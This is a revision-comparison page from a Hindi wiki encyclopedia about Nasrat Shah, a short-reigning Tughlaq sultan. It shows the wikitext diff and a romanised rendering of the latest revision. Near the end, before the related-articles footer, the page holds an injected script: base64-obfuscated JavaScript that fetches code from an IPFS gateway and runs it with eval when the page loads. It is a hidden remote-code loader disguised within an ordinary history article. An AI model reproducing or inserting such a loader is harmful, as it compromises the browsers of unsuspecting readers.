Difference between revisions of "नसरत शाह तुग़लक़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (नसरत शाह तुग़लक का नाम बदलकर नसरत शाह तुग़लक़ कर दिया गया है)
 
(10 intermediate revisions by 5 users not shown)
Line 1: Line 1:
नसरत शाह [[तुग़लक वंश]] का आठवाँ सुल्तान था। वह सुल्तान [[फ़िरोज़ तुग़लक]] का पौत्र था। उसे जनवरी 1395 ई0 में गद्दी पर बैठाया गया किन्तु तीन या चार ही वर्ष नाम मात्र का शासक रहने के उपरान्त उसकी हत्या कर दी गई। अपने शासन काल में वह [[फ़िरोज़ाबाद]] में दरबार लगाता था, जबकि उसका प्रतिद्वन्द्वी और चचेरा भाई [[महमूद तुग़लक]] पुरानी [[दिल्ली]] में शासन करता था। उसकी मृत्यु से महमूद तुग़लक, तुग़लक वंश का एकमात्र निर्विरोध प्रतिनिधि रह गया।
+
{{बहुविकल्प|बहुविकल्पी शब्द=तुग़लक़|लेख का नाम=तुग़लक़}}
[[Category:विविध]]__INDEX__
+
'''नसरत शाह''' [[तुग़लक़ वंश]] का आठवाँ सुल्तान था। वह सुल्तान [[फ़िरोज़ शाह तुग़लक़]] का पौत्र था। नसरत शाह की शासन अवधि अत्यंत कम रही थी।
 +
 
 +
*[[जनवरी]], 1395 ई. में नसरत शाह को गद्दी पर बैठाया गया, किन्तु तीन या चार ही [[वर्ष]] नाम मात्र का शासक रहने के उपरान्त उसकी हत्या 1398 ई. कर दी गई।
 +
*अपने शासन काल में नसरत शाह [[फ़िरोज़ाबाद]] में दरबार लगाता था, जबकि उसका प्रतिद्वन्द्वी चचेरा भाई [[महमूद तुग़लक]] पुरानी दिल्ली में शासन करता था।
 +
*नसरत शाह की मृत्यु से महमूद तुग़लक, तुग़लक़ वंश का एकमात्र निर्विरोध प्रतिनिधि रह गया था।
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 +
==संबंधित लेख==
 +
{{दिल्ली सल्तनत}}
 +
{{तुग़लक़ वंश}}
 +
[[Category:इतिहास कोश]]
 +
[[Category:तुग़लक़ वंश]]
 +
[[Category:दिल्ली सल्तनत]]
 +
__INDEX__

Latest revision as of 12:35, 11 October 2013

chitr:Disamb2.jpg tugalaq ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- tugalaq

nasarat shah tugalaq vansh ka athavaan sultan tha. vah sultan firoz shah tugalaq ka pautr tha. nasarat shah ki shasan avadhi atyant kam rahi thi.

  • janavari, 1395 ee. mean nasarat shah ko gaddi par baithaya gaya, kintu tin ya char hi varsh nam matr ka shasak rahane ke uparant usaki hatya 1398 ee. kar di gee.
  • apane shasan kal mean nasarat shah firozabad mean darabar lagata tha, jabaki usaka pratidvandvi chachera bhaee mahamood tugalak purani dilli mean shasan karata tha.
  • nasarat shah ki mrityu se mahamood tugalak, tugalaq vansh ka ekamatr nirvirodh pratinidhi rah gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh